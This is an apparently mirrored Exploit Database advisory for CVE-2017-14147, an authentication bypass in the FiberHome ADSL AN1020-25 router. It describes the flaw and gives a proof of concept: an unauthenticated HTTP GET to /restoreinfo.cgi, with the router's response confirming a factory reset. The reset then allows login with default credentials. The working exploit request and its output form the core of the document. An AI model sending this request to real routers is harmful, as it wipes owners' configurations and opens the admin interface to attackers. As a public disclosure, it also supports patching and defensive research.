FiberHome ADSL AN1020-25 – Improper Access Restrictions

• Exploit Database
• 17 阅读

• 作者： Ibad Shah
  日期： 2017-09-05
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42649/

• Title:
  ====
  
  FiberHome Unauthenticated ADSL Router Factory Reset.
  
  Credit:
  ======
  
  Name: Ibad Shah
  Twitter: @BeeFaauBee09
  Website: beefaaubee09.github.io
  
  
  CVE:
  =====
  
  CVE-2017-14147
  
  Date:
  ====
  
  05-09-2017 (dd/mm/yyyy)
  
  About FiberHome:
  ======
  
  FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
  
  Products & Services:
  Wireless 3G/4G broadband devices
  Custom engineered technologies
  Broadband devices
  
  URL : http://www.fiberhomegroup.com/
  
  
  Description:
  =======
  
  This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password. 
  
  
  
  Affected Device Model:
  =============
  
  FiberHome ADSL AN1020-25
  
  
  Exploitation-Technique:
  ===================
  
  Remote
  
  
  Details:
  =======
  
  Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
  
  1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
  
  Vulnerable restoreinfo.cgi
  
  
  
  Proof Of Concept:
  ================
  
  PoC : 
  
  GET /restoreinfo.cgi HTTP/1.1
  Host: 192.168.1.1
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.8
  Connection: close
  
  
  HTTP/1.1 200 Ok
  Server: micro_httpd
  Cache-Control: no-cache
  Date: Sat, 01 Jan 2000 00:12:39 GMT
  Content-Type: text/html
  Connection: close
  
  <html>
  <head>
  <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
  <link rel=stylesheet href='https://www.exploit-db.com/exploits/42649/stylemain.css' type='text/css'>
  <link rel=stylesheet href='https://www.exploit-db.com/exploits/42649/colors.css' type='text/css'>
  <script language="javascript">
  <!-- hide
  
  function restore() {
   var enblPopWin = '0';
   var loc = 'main.html';
   var code = 'window.top.location="' + loc + '"';
  
   if ( enblPopWin == '1' ) {
  loc = 'index.html';
  code = 'location="' + loc + '"';
   }
  
   eval(code);
  }
  
  function frmLoad() {
   setTimeout("restore()", 60000);
  }
  
  // done hiding -->
  </script>
  </head>
  
  <body onLoad='frmLoad()'>
  <blockquote>
  <b>DSL Router Restore</b><br><br>
  The DSL Router configuration has been restored to default settings and the
  router is rebooting.<br><br>
  Close the DSL Router Configuration window and wait for 2 minutes before
  reopening your web browser. If necessary, reconfigure your PC's IP address to
  match your new configuration.
  </blockquote>
  </body>
  </html>
  
  
  
  Credits:
  =======
  
  Ibad Shah, Taimooor Zafar, Owais Mehtab